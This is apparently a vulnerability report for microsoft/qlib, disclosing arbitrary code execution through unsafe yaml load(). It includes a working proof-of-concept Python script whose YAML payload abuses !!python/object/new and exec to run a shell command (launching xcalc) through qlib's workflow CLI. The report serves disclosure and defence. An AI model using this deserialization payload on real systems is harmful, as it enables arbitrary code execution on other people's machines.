Code Injection in microsoft/qlib
Valid
Reported on
Dec 21st 2020
Description
Arbitrary Code Excecution in microsoft/qlib. Qlib is an AI-oriented quantitative investment platform, which aims to realize the potential, empower the research, and create the value of AI technologies in quantitative investment.
Technical Description
This package was vulnerable to Arbitrary code execution due to a use of a known vulnerable function load() in yaml
Exploit code
Python File
import os
import qlib.workflow.cli as cli
exploit = """!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('xcalc')"
"""
open('exploit.yml','w+').write(exploit)
cli.workflow('exploit.yml','workflow','/tmp')
os.system('rm exploit.yml')
POC
- Run the exploit code
to join this conversation